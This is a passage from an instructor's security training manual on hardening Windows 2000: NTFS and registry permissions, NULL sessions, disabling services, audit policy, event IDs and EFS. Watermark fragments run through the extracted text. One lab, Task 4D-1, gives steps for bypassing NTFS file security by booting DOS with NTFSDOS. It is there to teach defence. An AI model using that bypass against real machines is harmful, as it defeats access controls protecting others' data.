The process of setting permissions is similar to that of Windows NT 4.0, with the exception that you will specically allow or deny access. If you want to give a user or a group what was called No Access in Windows NT, you would give that user or group Deny to the Full Control permission in Windows 2000. Setting permissions is a fairly straightforward job, and one that all security professionals should be comfortable with. There is a way, however, that an attacker will be able to get around your NTFS security if he or she is able to get physical access to the computer. This is to use an alternative OSspecically, MS-DOS. You might be thinking that using DOS will not have an effect on any les that are on an NTFS partition, and that DOS will not even be able to recognize the NTFS partition. In most situations this is true; however, there are tools and utilities on the market that are designed to access NTFS from DOS. The most common of these tools is simply called NTFSDOS and is made by a company called Sysinternals. The following task will allow you to access a secured NTFS le via DOS.
NO
PL
IC
To remove all permissions except for those that have been specically applied.
or
AT
iti
on
TASK 4D-1
Compromising NTFS Security
1. 2. 3.
On your Windows 2000 boot partition, create a folder called Secure.
Within this folder, create a new text le called secret.txt, and add the text This is a secure le. to the document.
Set the security on this le so that the Everyone group has Full ControlDeny, and acknowledge the warning message. Now, not even the administrator should be able to access this le. Test the security by trying to open the Secure.txt le. You should not be able to access the le. Restart the computer, and boot to DOS, using the bootable oppy disk that holds NTFSDOS. At the DOS prompt, enter ntfsdos to start the utility. The NTFS partitions are mounted, with drive letters assigned to them.
5. 6. 7. 8. 9.
Ed
T DU PL IC
4.
Enter type secret.txt to display the text le to the screen. Observe the contents of the so-called secret.txt le.
10. Remove the bootable oppy disk, and reboot the computer.
The NULL Session
st
In order for a system to provide shared resources to the network, it must communicate with the network. This communication is normally done via anonymous connections from system to system. Internally, this may not present a problem, but if the machine is directly connected to the Internet, this operation can allow an attacker to learn about the inside network without authorization. When an attacker connects in this manner (with the anonymous logon), this is called a NULL session connection. In order to combat this situation, you should disable the NULL session. This can be done via any of the security templates, as follows: 1. Open any of the security templates in the MMC. 2. 3. 4.
In
Navigate to Local Policies. Navigate to Security Options. Set Additional Restrictions For Anonymous Connections to No Access Without Explicit Anonymous Permissions.
DO
ru ct
NO
or
Navigate to the partition where you created the Secure folder, and enter cd secure to change directory to this folder.
AT
E
275
iti
on
Setup: You are logged on to Windows 2000 as the renamed Administrator account. This task requires the NTFSDOS utility to be on a bootable oppy disk.
If you have not created boot oppies for this task, provide students with blank disks and have them create their own.
Windows 2000 Printer Security

When you are setting up the security options on a printer in Windows 2000, you have three permissions that you can apply: Print, Manage Printers, and Manage Documents. The default level of security provided to users is Print, meaning that they are given the right to print, pause, resume, restart, and cancel documents that they have submitted to a printer. If you want to provide users with more control over a printer, you can give them the permission of Manage Documents. This level of permissions means that they are given the right to pause, resume, restart, and cancel all documents that have been submitted to this printer. If you want to provide users, such as junior administrators or persons who are responsible for overall printer management, with even more control over a printer, you can give them the permission of Manage Printers. This means that they are given the right to share the printer, change printer permissions, change printer properties, and delete printers.
or
DO NO
ru ct
Windows 2000 Registry Security
276
In
st
Securing the Registry in Windows 2000
The Windows 2000 Registry can be directly manipulated with the same tools as the Windows NT 4.0 RegistryRegedit.exe and Regedt32.exe. As mentioned earlier, it is recommended that Regedt32.exe be used, because permissions can be applied to individual keys as you see t. When setting the primary permissions in the Registry, however, you have only Read and Full Control to choose from.
DU
The Registry stores the conguration data for the computer and, as such, is obviously a critical item to secure properly. Thankfully, users will not have the same level of interaction with the Registry as they will with network resources.
PL
IC
In addition to securing the printer, you must take care to secure the spooler that holds print jobs waiting to print. If the spooler is left at the default, it is in the %systemroot%, which allows Everyone Full Control. This location should be moved to a secure NTFS location, where it can be managed individually.
AT
Although setting permissions can provide you with the security you require, you can get more control still over the printer. In the Advanced settings of a printer, you can dene the hours in which the printer is available. If the printer is to be used only during business hours, there is no reason to have the permissions of the printer set so that it can be used 24x7. This type of control helps to keep the device used for business purposes only.
Ed
iti
on
Securing Printers in Windows 2000
The permissions that are available for the Registry are different than the permissions used for securing les. The following list contains the permissions that affect the Registry: Query ValueAsk for and receive the value of a Registry key. Set ValueChange a key value. Enumerate SubkeysList the subkeys. NotifySet auditing. Create LinkLink this key to some other key. Write DACChange permissions. Read ControlFind the owner of a key. Write OwnerChange ownership of a key. DeleteDelete the key.
or
DO NO
Default Registry Configurations
ru ct
In
When changing areas of the Registry, be sure that you have planned out the changes very carefully, as unintended consequences can happen very easily and quickly. In the following task, you will congure permissions on an area of the Registry.
st
Power Users are given permission to create subkeys in the HKEY_LOCAL_ MACHINE\SOFTWARE\ key, which has the result of allowing them to install new software packages. Power Users then have Full Control over the subkeys they create, as does the CREATOR OWNER Account. The extent of control for Power Users does not expand into all areas of the Registry. For example, in the Hardware hive of the Registry, Power Users are not on the list to set permissions, by default.
DU
Earlier, we discussed the processes put in place by Windows to help protect system les. There are also systems in place to protect the Registry by default. Administrators and the SYSTEM account should have Full Control to all areas of the Registry.
PL
IC
AT
There is no Special Access Permission listing on the primary Permissions page, but there is an Advanced button. If a user has the Read box checked, you should review the Special Access Permissions to be sure of the exact permissions given to that user. On the same page as the special permissions is the settings for where this set of permissions is to be applied. You have the ability to apply permissions to This Key Only, This Key and Subkeys, or to Subkeys Only.
Ed
Of the two permissions that can be applied, Full Control is the equivalent of all the permissions listed. The Read permission is the equivalent of the Query Value, Notify, Read Control, and Enumerate Subkeys permissions. The listing or the Read permission can be a bit misleading at times.
E
277
iti
on
Create SubkeyCreate a subkey.
audit: The independent examination of records and activities to ensure compliance with established controls, policy, and operational procedures, and to recommend any indicated changes in controls, policy, or procedures.
TASK 4D-2
Setting Registry Permissions
1. 2. 3. 4. 5. 6. 7. Log on to Windows 2000 as the renamed Administrator account. Open Regedt32 to prepare for setting permissions for the Registry. Select the HKEY_LOCAL_MACHINE window.
Expand the SAM and observe that the subkey is grayed out.
In the Permission list, give the Administrators group Full Control. Click OK.
Registry Backup
ru ct st
TASK 4D-3
Saving Registry Information

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Regedt32 is running.
In
1. 2. 3. 4.
Select the Software subkey for HKEY_LOCAL_MACHINE. Choose RegistrySave Key. Create a folder named Reg_Keys on the Windows 2000 partition. For the le name, enter Soft_One as and click Save.
278
DO
NO
The nal location to secure in regards to Registry backup is in the OS les. Stored in the %systemroot%\repair folder are settings that must be secured. This folder holds the Registry conguration information that is used in the event the system needs to be repaired.
DU
PL
IC
If you do not want to use the save option available in the Registry Editor, you can use the Microsoft Backup program. This utility can create a full backup of the System State, which includes the Registry conguration information. Just as with the saved subkeys and keys, your storage options for backups is critical. A compromised System State backup can be almost as devastating as a compromise of the server itself.
or
AT
In order to cover the security of the Registry, you must have a backup strategy for the organization. There are several ways in which to back up the Registry: The rst is in the Registry itselfyou can save subkeys. If you are going to use this built-in option, be sure that you secure the saved les very well.
Ed
Expand the SAM to verify that usernames and account information is now visible to you.
iti
Select the grayed-out SAM, and choose SecurityPermissions.
on
5. 6. 7. 8. 9.
Close the Registry Editor. Open My Computer, and navigate to the Reg_Keys folder that you created. Right-click and choose Properties. Select the Security tab. Set the security so that only your user account has Full Control, and remove any access to any other user account or group. Close all open windows.
Ed
DU PL IC T
TASK 4D-4
Blocking Registry Access
1. 2. 3. 4. 5. 6.
Open Regedit, and navigate to HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies. Right-click Policies, and add a new key called System.
ru ct
Setup: You are logged on to Windows 2000 as the renamed Administrator account. For this task, you should again work in pairs, with one partner observing as the other completes the task, and then reversing the roles.
or
DO NO
AT
If students are unable to re-enable local Registry access, their ability to complete future tasks will be severely affected. You might want to have them back up the entire Registry to a safe place prior to performing this task, or you can skip the task altogether. To ensure that you will be able to troubleshoot this task, make sure that at least one machine in the classroom setup always has the Registry tools enabled.
Provide a REG_DWORD value of 1. A value of 0 would allow Registry Editing Tools.
In
Close the Registry Editor.
Attempt to access the Registry with either Regedit or Regedt32. You should not be able to open the Registry Editor. To recover this ability, you will need to access the Registry remotely from another computer.
st
In the right pane, right-click and add a new DWORD value named DisableRegistryTools.
E
279
You might want to implement normal controls on programs such as Regedit.exe and Regedt32.exe to prevent unauthorized users from executing these applications. If you are even more paranoid, however, you can completely remove the applications from the hard drive and perform remote Registry management of the machine. In the event that deleting the executable les is still not good enough for your tastes, you can go into the Registry and disable access to the Registry. Obviously, this can be a dangerous option, as you are literally disabling Registry editing tools on the local machine. You will have no choice other than remote management at this stage, so make sure that you can perform remote management prior to taking this action.
iti
Blocking Access to the Registry
on
7.
Create a share of your \WINNT\System32 folder. Allow your remote administration (scnpxxxb) account Full Control, and remove all other permission for all other users and groups. Switch computers with your neighbor, and access the Registry on your computer. Choose RegistryConnect Network Registry, enter your IP address, and click OK. Expand HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Policies\System.
8.
9.
10. Set DisableRegistryTools to 0 so that you will again be able to edit the Registry from the local machine. 11. Return to your own computer, and verify that you can open the Registry tools. Notify your instructor if you have trouble completing this step.
Be prepared to troubleshoot. All students must be able to access Registry tools before proceeding to the next activity.
System Hardening
System Hardening
ru ct st In
Figure 4-10: Services that can be managed on a Windows 2000 computer.
DO
NO
DU
PL
On the vast majority of Windows installations, the services that are loaded and running by default are not needed, nor will they be used in secure environments. Many of the services are installed with the OS, and others will be added as applications are added to the system.
or
Disabling Services
IC
AT
Now that you have seen how to secure resources, including access to the Registry, it is time to secure the base operating system itself. This includes removal of unneeded services, setting security permissions on common executables, disabling unused subsystems, and keeping updated on Service Packs and Hotxes.
Ed
iti
on
Services can be one of three Startup types: Manual, Automatic, and Disabled. Manual Startup implies that you will congure the service upon need, but it will not start when the system is initialized. The Automatic setting will execute the startup conguration when the system starts.
A nice feature in Windows 2000 is the ability to nd out what other services are required for a given service to run. These are known as dependencies. For example, in order for the Messenger service to run properly, both the Remote Procedure Call (RPC) and the Workstation service must be running.
Ed or ru ct
Securing Common Executables
st
In
DO
In hardening the OS, an often-overlooked option is to harden the actual programs that are often used in exploits. You can increase the security of the system by placing permissions on these applications.
NO
T
Figure 4-11: Example of service dependencies in Windows 2000.
DU
PL
IC
AT
E
281
iti
on
Disabled means that the service will not execute until you manually recongure it to be an active service.
For the applications listed here, you might want to create a new group for individuals who require access, not including the Administrators group or the System (sometimes called LocalSystem on a standalone server) account. Then, provide the desired level of permissions on the executables. Be aware that altering the permissions on these can affect applications, so you can adjust as needed if the situation arises. Add to or remove from this list for your unique conguration: arp.exe at.exe attrib.exe cacls.exe cmd.exe command.com debug.exe dialer.exe edit.com nger.exe ftp.exe ipcong.exe nbtstat.exe net.exe netstat.exe nslookup.exe ping.exe rcp.exe
Ed
DO NO T DU PL IC
rdisk.exe
282
In
st
ru ct
regedt32.exe rexec.exe route.exe rsh.exe runonce.exe sysedit.exe telnet.exe tftp.exe tracert.exe xcopy.exe
regedit.exe
or
AT
iti
on
Disabling Subsystems
In Windows 2000, there are several subsystems that are loaded with the installation of the operating system. These subsystems can provide the environments needed for running software. For example, there is a subsystem for OS/2 applications. You might want to remove the subsystems that you will not be using. To do this requires two steps: 1. 2. Edit the Registry to remove references to the subsystems that you want to disable. Remove the actual les required for the subsystem.
Removing Unneeded Subsystems
1. 2. 3. 4. 5.
Navigate to \WINNT\System32 and delete the les posix.exe, psxss.exe, os2.exe, os2srv.exe, and os2ss.exe. Open the Registry Editor.
Ed
T DU PL IC
Setup: You are logged on to Windows 2000 as the renamed Administrator account, and local Registry editing has been re-enabled.
In this subkey, delete the entries for Posix and Os2. Close the Registry Editor.
Topic 4E
Windows 2000 Auditing and Logging
st
In
Although Windows 2000 automatically tracks and records events in the Application and System Logs, Security Logging must be turned on in order to view any Security Log events. To turn on Security Logging, you must create an Audit Policy.
DO
In Windows 2000, logging can be very complete, enough so that the average administrator can easily become frustrated sorting the volumes of information that have been recorded. The volumes of information that are collected are viewed in the Event Viewer tool. The Event Viewer offers three primary logs: the Application Log, Security Log, and the System Log. In this topic, you will be focused on the Security Log.
ru ct
NO
or
AT
Auditing and Logging
Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems.
E
283
iti
TASK 4D-5
on
Conguring the Audit Policy will allow you to have more granular control over the specic events that are recorded into the logs. For example, you might want to log just attempts at logging on and off the system, or only changes to policy options. The following list identies each policy option and provides a short description of the settings:
Audit Account ManagementThis setting logs changes to, creation of, and deletion of a user account or group. This setting can additionally log renaming, disabling, enabling, and password changes for a user account.
Audit Logon EventsThis setting logs users logging on and off, and logs network connection terminations. Audit Object AccessThis setting logs access to a le, folder, or printer. In order for this log to function, the object needs to be congured for auditing. Audit Policy ChangeThis setting will log any changes to the audit policies, user rights, or user security settings.
ru ct st
In
DO
NO
DU
PL
IC
Audit System EventsThis setting will log system events, such as the shutdown or restart of the computer.
or
AT
Audit Process TrackingThis setting will log applications executing processes in the system.
Audit Privilege UseThis setting will log use of a privilege by a user account.
Ed
iti
Audit Directory Service AccessThis setting logs access to an Active Directory object by a user. In order for this log to function, the object needs to be congured for auditing.
on
Audit Account Logon EventsThis setting will log user account logon events. This can include events like Kerberos ticket information and accounts used for logon.
Ed or ru ct
Figure 4-12: Audit Policy settings of the Local Computer policy.
st
Active Directory Auditing

Just as you can log access to an object like a le or a folder, you can log access to an Active Directory object. The rst thing you need to do is to enable the auditing of Active Directory objects in your Audit Policy. Then, select the specic objects that you want to audit.
Lesson 4: Hardening Windows Computers 285
In
An example of security-related auditing, other than a normal le-access log, is to track access to the System32 folder of the OS. As a critical folder, it can provide relevant security information to see which users are accessing the contents of this folder, and when they are accessing it.
DO
To audit access to specic objects such as les, folders, and printers, you will need to perform conguration on the object itself, in addition to the creation of the Audit Policy. The auditing section of the object is located on the Security tab of the Properties for the object. Click the Advanced button, and select the Auditing tab.
NO
Object Auditing
DU
The object you want to audit must be on an NTFS partition.
PL
IC
AT
iti
on
In order for the policy to take effect, you have several options. One is to wait until the policy propagates at the regular interval, which can be congured by the administrator. Another option is to run the command secedit /refreshpolicy machine_policy at the command prompt.
TASK 4E-1
Enabling Auditing
1. 2. 3. 4. 5. 6. 7. 8. 9.
From Administrative Tools, open the Local Security Policy.
Double-click Audit Account Logon Events.
Check both Success and Failure, and click OK. Double-click Audit Logon Events.
Ed
T DU
Expand Local Policies, and select Audit Policy.
Close the Local Security Policy.
or
DO NO
Open a command prompt, and enter secedit /refreshpolicy machine_ policy to force the policy to refresh now. Open the Local Security Policy, and verify that the new settings have taken effect.
286
In
st
ru ct
10. Close the Local Security Policy.
Registry Auditing
Auditing the Registry can provide critical information in securing the network, and can also provide important data in troubleshooting an event. This is similar to the process required for auditing other events, in that you choose the object, and then congure the auditing on the object. Remember that in order to congure auditing of the Registry, you will need to use Regedt32, not Regedit. When you do congure audits by using Regedt32, be aware that the objects you audit will be tracked even if an access is made using Regedit.
PL
IC
AT
Check both Success and Failure, and click OK.
iti
on
The options available in auditing the Registry are a bit different than in auditing a le or folder. There are permissions such as Query Value or Set Value. The list of accesses that can be audited are shown in Figure 4-13. Some of the auditing options are detailed as follows: Query ValueAudit the user or group reading the object. Create SubkeyAudit the user or group creating a key. Enumerate SubkeysAudit the user or group enumerating a list of keys in the object.
Ed or ru ct
Figure 4-13: Options for auditing the SAM in the Registry.
st
TASK 4E-2
Logging SAM Registry Access
1.
2.
In
Create a regular user account called Ordinary, and assign Ord1n8ry? as the password. Remember to uncheck User Must Change Password On Logon before clicking Create. Allow the Ordinary user account the right to Log On Locally.
DO
NO
These options can be congured for either success or failure. So, if you want to know who has failed in their attempt to read the SAM, you would select the group and audit Query Value Failures.
DU
PL
IC
AT
iti
on
Set ValueAudit the user or group writing to the object.
3. 4. 5. 6. 7. 8. 9.
Open Regedt32. Navigate to HKEY_LOCAL_MACHINE\SAM. Choose SecurityPermissions.
Select the Auditing tab. Add the user account Ordinary.
For Query Value, check both Successful and Failed, and click OK.
10. Click OK to close the SAM Access Control Settings.
11. Click OK to close the SAM Permissions, and close Regedt32.
13. Open a Registry Editor, and attempt to open the SAM subkey. You should receive an error message. Click OK to clear the message. 14. Close the Registry Editor, and log off.
Ed
T DU
12. Log off as the renamed Administrator account, and log on as Ordinary. If you are prompted to save the changes to the console, click No.
or
DO NO
Managing the Event Viewer
288
In
st
ru ct
In the Event Viewer, you will perform your primary functions in reading and managing the logs of the system. You can also use software to manage the logs and to send the logs to a database for viewing, but at this point, you will work directly in the Event Viewer. The Event Viewer provides the three logs: Application, System, and Security. In the Event Viewer logs, there are ve types of events that can be reported. They are Error, Warning, Information, Success Audit, and Failure Audit. You can add components to Event Viewer, based on the applications installed, such as DNS, as shown in Figure 4-14. The logs are listed in the Viewer with the most current event being the highest on the list. You might need to go up and down the list to follow a sequence of events. You can also sort the columns by clicking any column name.
PL
IC
AT
15. Log back on as the renamed Administrator account. You will examine the Event Viewer logs shortly.
iti
on
Click the Advanced button.
Figure 4-14: An example of the Event Viewer with a Failure Audit.
The user account that performed the action. The success or failure of the event.
You will also be able to learn information, such as the time of the event, names of computers involved, IP addresses of computers involved, and more. In Figure 4-15, you can see an event with the following information: The date and time of the event. The user account that triggered the event. That the event was a failure. The name of the computer where the event happened. The name of the object that was audited.
Ed
T DU PL IC
st
In
DO
ru ct
From this single detailed log, you are able to say that user account Ordinary, on computer named INS-W2K-01, at 19:32, on 11/21/2002, tried and failed to access the SAM subkey of the Registry.
NO
or
AT
E
289
iti
The objects that you choose to log will provide three primary sources of information to you: The action that was performed.
on
Ed ru ct
1. 2. 3. Open the Event Viewer. Open the Security Log.
Locate the Failure Event for your attempted Registry access. If for some reason your Failure Event does not display, review the preceding Concepts section to view an example of one. Compare what you can identify from your log to the previous example. You should be able to identify: a. User Account b. c. d. e. f. Date Time Success or Failure Computer Name Object Accessed
st
4.
In
5.
Once you have identied these items, close the Event Viewer.
DO
NO
DU
PL
Viewing the Registry Audit
IC
TASK 4E-3
or
AT
Figure 4-15: A failed attempt at accessing a Registry key, logged in Event Viewer.
iti
on
Event IDs
Although at this stage mentioning that you have a series of 529 events, all one minute apart may not mean anything, you should be comfortable with the primary Event IDs, so that you can quickly be aware of what is happening on the system.
Event ID
512 513 517 528 529 530 531 540 624 626 628 629 644 645
Description
Successful starting of the operating system. Successful shutting down of the operating system. Successful clearing of the Audit Log. Successful logon. Failure of a logon due to unknown username or bad password. Failure of a logon due to account logon-time restrictions. Failure of a logon due to the account being disabled. Successful network logon. Successful creation of a new user account. Successful enabling of a user account. Successful change of a user accounts password. Successful disabling of a user account. Successful locking out of a user account. Successful creation of a new computer account.
Ed
T DU PL IC
You can nd complete descriptions of Event IDs online in many locations, and from Microsoft at http://support.microsoft.com.
Authentication Logging
In order to bring the overall options in logging down to a smaller subject, you will focus here just on the Authentication process. Windows 2000 can provide extensive logs on all successes and failures of the logon process. This will assist you greatly when investigating security issues and troubleshooting account access. The following table lists Event IDs that are all directly related to the Authentication process in Windows 2000, and are enabled by choosing Success and Failure of Logon Events in the Audit Policy.
st
Event ID
528 529 530 531 532 533 534 535
Description
A successful logon. A failed logon due to unknown user name or bad password. A failed logon due to account logon-time restrictions. A failed logon due to the account being currently disabled. A failed logon due to the account being expired. A failed logon due to the account not allowed to logon at the computer. A failed logon due to the account not being granted the logon type requested at the computer, such as interactive or network. A failed logon due to the accounts password being expired.
In
DO
ru ct
NO
or
AT
E
291
iti
on
The following table lists common security-related Event IDs. You should become comfortable with these IDs, as you will see them often in your work as a security professional.
Event ID
536 537 538 539 540
Description
A failed logon due to NetLogon not being active. A failed logon due to an unexpected error during the logon attempt. A successful logoff of an account. A failed logon due to the account being locked out. A successful network logon.
When you go to examine the details of the Authentication Log, you will nd that Logon Type is an entry in the log. There are six different Logon Types:

proxy: A rewall mechanism that replaces the IP address of a host on the internal (protected) network with its own IP address for all trafc passing through it. A software agent that acts on behalf of a user; typical proxies accept a connection from a user, make a decision as to whether or not the user or client IP address is permitted to use the proxy, perhaps does additional authentication, and then completes a connection on behalf of the user to a remote destination.
Logon Type 4: Batch Logon Type 5: Service Logon Type 6: Proxy
Logon Type 7: Unlock the Workstation
KSecDDksecdd.sys, the security device driver
ru ct
Event ID
672 673 674 675 676 677 678 679 680
LAN Manager Workstation Service advapiAPI call to LogonUser
MS.RADIUThe RADIUS authentication package; a part of the Microsoft Internet Authentication Services (IAS)
st
Description
292
In
DO
Successful authentication ticket granted. Successful service ticket granted. Successful ticket granted renewed. Failure of Pre-Authentication. Failure of the authentication ticket request. Failure of the service ticket request. Successful account mapped for logon. Failure of the account being mapped for logon. Successful account used for logon.
NO
Frequently, administrators will use only the Logon Events as described previously. You can add Account Logon Events to your Audit Policy. If you do add this option for Success and Failure, you will see the Event IDs reported, as shown in the following table.
DU
PL
SCMgrThe Service Control Manager
IC
User32 or WinLogon\MSGinawinlogon.exe and msgina.dll, the authentication user interface
or
AT
In addition to the Logon Type that you will nd in the log, you will nd an entry called the Logon Process. There are seven different Logon Processes, and they are more technical in their description than the previous elds. The Logon Processes are as follows: NtLmSsp or MICROSOFT_AUTHENTICATION_PACKAGE_V1_0: msv1_ 0.dll, the default authentication package
Ed
iti
Numbers 0 and 1 are not valid Logon Types.
Logon Type 2: Interactive Logon Type 3: Network
on
Event ID
681 682 683
Description
The logon to account <CLIENT NAME> by <SOURCE> from workstation computername failed. The Error Code was ErrorCode. Successful session reconnected to Winstation. Successful session disconnection from Winstation.
Note that for Event ID 681, there is a eld called ErrorCode. The error codes provide an even higher level of detail on the specics of an event. The following table denes the Error Code and provides a description in the reason for the logon failure. Error Code
3221225572 3221225578 3221226036 3221225586 3221225583 3221225584 3221225875 3221225585 3221226020
or
DO NO
ru ct
TASK 4E-4
Creating Events
1. 2. 3. 4. 5. 6.
Open the Event Viewer.
Right-click the Security Log and choose Clear All Events. When you are prompted to save the log, click No. Close the Event Viewer.
In
Create a user account using your rst name, and f1R5+n@m3 as the password. Grant the new user account the right to log on locally.
st
DU
PL
IC
AT
The username provided does not exist. The username provided is correct, but the password is incorrect. The user account is locked out. The user account is disabled. The user account attempted to logon outside the user account allowed logon hours. The user account attempted to logon from a workstation the account did not have the right to logon from. The user account has expired. The user account attempted to logon using an expired password. The user attempted to logon with a user account where the Administrator has dened User Must Change Password At Next Logon option.
Ed
E
293
iti
Description
on
7.
To lock the computer, press Ctrl+Alt+Delete, and then click Lock Computer.
Lock the computer, while logged on as the renamed Administrator account. Unlock the computer, using the renamed Administrator credentials. Log off the renamed Administrator account.
8. 9.
10. Log on as your newest user account (the one with your rst name), using the wrong password. This should fail. 11. Log on as your newest user account, using the correct password. This should be successful.
14. Close the network connection, and log off your user account. 15. Log back on as your renamed Administrator account.
Ed
T DU
13. Attempt to connect to another computer in the network as a remote Administrator account with the correct password. This should be successful.
st
2.
Open the Security Log and examine the log. You should be able to identify at least one of each of the following: a. A successful local logon. b. c. d. e. A successful unlocking of the computer. A successful network logon. A failed local logon attempt. A failed network logon attempt.
294
In
DO
ru ct
TASK 4E-5
1.
Viewing Event Logs
Open the Event Viewer.
NO
PL
Now that you have created a group of events to analyze, you will run through this process. Try to follow the sequence of events as you triggered them. Watch for the local and network differences in the logs and identify the Event IDs for quick analysis.
or
IC
AT
Viewing Event Logs
iti
12. Attempt to connect to another computer in the network. This should fail, as user accounts for other students were not created on your computer, and vice versa.
on
3. 4.
Identify the Event IDs, Logon Types, and the Error Codes where they apply. Close the Event Viewer.
Once you become more comfortable with Event IDs, you will be aware that a series of 529 events can be an indication of a possible attack. However, with all of the events that can happen and all of the data that can be collected, the process of simply viewing and managing the log les can become tedious, and even overwhelming. There are features built in to the Event Viewer that are designed to help you work with the volumes of data that are collected. In addition to the features of Event Viewer, there are third-party applications that are designed to manage the logs. These applications lter specic events, group them for simplicity, and can notify you in case a dened sequence of events happens.
Event Viewer Features
ru ct
st
In
If you will need to store the logs for later reading or analysis, there is also an option to save the log. You can save the log as either an Event Log le (*.evt), a text le (*.txt), or a CSV (Comma Separated Value or Comma Delimited) le (*.cvs). You can then open these les later in Event Viewer or in a database or other reading application.
DO
Finally, a very direct feature in the Event Viewer is the sorting option. Just as in other Windows applications, you can sort by any of the columns in the Event Viewer to group events, such as by time or by Event ID. By default, the Event Viewer displays events with the most recent event on the top of the list.
NO
When you apply a lter, the full log data is not altered, only the presentation of the data on screen. You have the same options for ltering as were available to you when searching. In addition to the elds that are available with the Find command, you will also have the option to dene events from and to a specic date and time.
DU
In addition to the Find function, you can use the ViewFilter command. The Filter Events function enables you to select specic criteria, apply the lter, and view only the events that are relevant to your lter. For example, if you are still under the impression that an account is being attacked; you can select that account as the lter, and view all instances of that account in the Security Log.
PL
IC
To nd any of these, you will use the ViewFind command. With this command, you can search for events by using elds, including Event Source, Event ID, User, Computer, Success, Failure, Information, Warning, and Error.
or
AT
One of the most straightforward features in the Event Viewer is the Search function. For example, you might be looking for all of the 529 events after a new password policy has been implemented. You need to determine the amount of bad logons in comparison to before the policy was put in place. Or, you may suspect that a user account is being attacked and want to search only for 529 events that are related to a certain user account.
Ed
E
295
iti
on
Managing Log Files
Third-party Applications
As functional as the built in features of the Event Viewer are, for many people they do not provide enough control or options. To address that need, there are several third-party applications that work for managing the Event Logs. One of these programs is the Event Log Sentry, by Engagent, whose Web site is www.engagent.com. This tool enables you to manage the logs of several computers from a single location. By using this tool, you can monitor events in real-time and have the software contact you or trigger an automated response to the events. This tool crosses the line from simply viewing the Event Logs into the realm of Intrusion Detection Systems (IDS). IDS is beyond the scope of this course and will be fully covered along with the Event Log Sentry tool in the Network Defense and Countermeasures course.
Windows 2000 EFS
EFS
or
DO NO
ru ct
To solve this issue, we now introduce the concept of data encryption. Not a new idea, data encryption works to make the les on the computer useful only to the proper owner of the data. Some of these systems would work by providing a password for each encrypted le, whichwhile effectiveis not practical for large volumes of les. Another method of using encryption is to use a key to unlock each le that has been encrypted, with only one user holding the key. This is the approach that Microsofts Encrypting File System (EFS) takes to data encryption. EFS uses what is known as public key cryptography, the details of which are beyond the scope of this course. In general, however, public key cryptography is the use of two keys: one that performs encryption and another that performs decryption. The keys are linked by a mathematical formula. Each le that is encrypted by EFS has a unique key pair protecting its contents, using the DES encryption algorithm.
In
st
DU
By using NTFS security, you are able to combat the issues of security to a certain extent. As demonstrated, there are tools available to access even properly secured data on an NTFS partition.
PL
IC
In addition to the security risks of multiple operating systems, there are complex security risks introduced with the use of laptop computers. Laptops often get stolen or misplaced, and the data on the laptop computer is vulnerable to compromise as soon as the location of the computer is unknown (unknown to the owner, that is).
AT
One of the signicant benets to using personal computers is that you have the ability to boot into multiple operating systems for whatever use you feel is appropriate. Although this presents great convenience and benet to the users of computers, it presents great difficulty in the world of security, especially in the corporate environment.
Ed
intrusion detection: Pertaining to techniques which attempt to detect intrusion into a computer or network by observation of actions, security logs, or audit data. Detection of break-ins or attempts either manually or via software expert systems that operate on logs or other information available.
Topic 4F
iti
on
The implementation of EFS works directly with NTFS. Data can be encrypted only on NTFS partitions. EFS is designed to encrypt any temporary les created along with the originals, and the keys are stored in the kernel using nonpaged memory, so they are never vulnerable to an attacker searching the pagele of the system.
EFS and Users
One of the things that can be a goodor badissue of EFS is that users can use it with no administrative effort. The EFS subsystem automatically creates the required keys, if the user does not already have a public key pair to use. Files and folders that are marked for encryption are encrypted on a per-le or per-folder basis, each with a unique encryption key. Because they are encrypted uniquely, if you move an encrypted le to an unencrypted folder on the same partition, the le will remain encrypted. If you copy an encrypted le to a location that allows for encryption, the le will remain encrypted.
or
DO NO
Data Recovery
ru ct
EFS Cryptography
The FEK itself is then encrypted by using a public key, which creates a list of encrypted FEKs. The list is then stored with the encrypted le in a special attribute called the Data Decryption Field (DDF). When a user needs to decrypt the le, he or she will use the private key that was part of the key pair.
In
As mentioned, EFS uses public key cryptography, based on the DES encryption algorithm. This is the default; with Service Pack 1 and the High-encryption pack or with Service Pack 2 or greater, 3DES is used. Data is encrypted by what is called a File Encryption Key (FEK). This FEK is a randomly generated key, as required by the algorithm.
st
Using Data Recovery is designed for those companies and organizations who have the requirement of accessing data if an employee leaves or if the encryption key is lost. The policy for how Data Recovery will be implemented is dened at a Domain Controller and will be enforced on every computer in that domain. If EFS is implemented on a machine that is not part of a domain, the system will automatically generate and save Recovery Keys.
DU
Obviously, if EFS can be implemented by a user, and is designed to be transparent, it can be used where it was not intended. EFS allows for what are known as Recovery Agents. The default Recovery Agent is the Administrator. These agents have congured public keys that are used to enable le recovery. The system is designed so that only the le recovery is possible; the Recovery Agent cannot learn about the users private key.
PL
IC
AT
The use of EFS is designed to be transparent to the user. This means that a user may have encryption enabled and not be aware of it. As long as things go smoothly, this is not an issue. In the event things do not go smoothly, there are methods for recovery.
Ed
iti
on
EFS supports le encryption both on a local hard drive and on a remote le server. However, it is very important to note that any les that are encrypted on the remote server will be transmitted over the network in cleartext by default. This is because the le is decrypted at the le server and then sent to the user. In order to maintain a high level of security, there must be a mechanism in place to secure the network traffic, such as IPSec, which you worked with earlier in the course.
You can perform encryption from the command line or from within Explorer. When you are using Explorer, the option to encrypt is on the Advanced tab of the general Properties window. When you are using the command line, the command is cipher, with an /e switch for encryption and a /d switch for decryption.
TASK 4F-1
Encrypting Files
Setup: You are logged on to Windows 2000 as the renamed Administrator account. 1. 2. 3. 4. 5. At the root of the NTFS partition, create a text document called Mine.txt, and place some text in it. Open Explorer, and display the properties of the Mine.txt le. Click Advanced, check Encrypt Contents To Secure Data, and click OK twice. Observe the Explorer window to verify that the E attribute is now set. Close all open windows.
Ed
T DU
or
DO NO
Topic 4G
Securing Network Communications
Windows 2000 Network Security
298
In
st
ru ct
About the Tasks
In this topic, you will examine the effects of turning on/off the NetBIOS protocol on a Windows 2000 machine. NetBIOS stands for Network Basic Input Output System, and is an API that allows for addressing of devices on a network, regardless of the underlying protocol such as IP or IPX. NetBIOS itself relies on SMB.
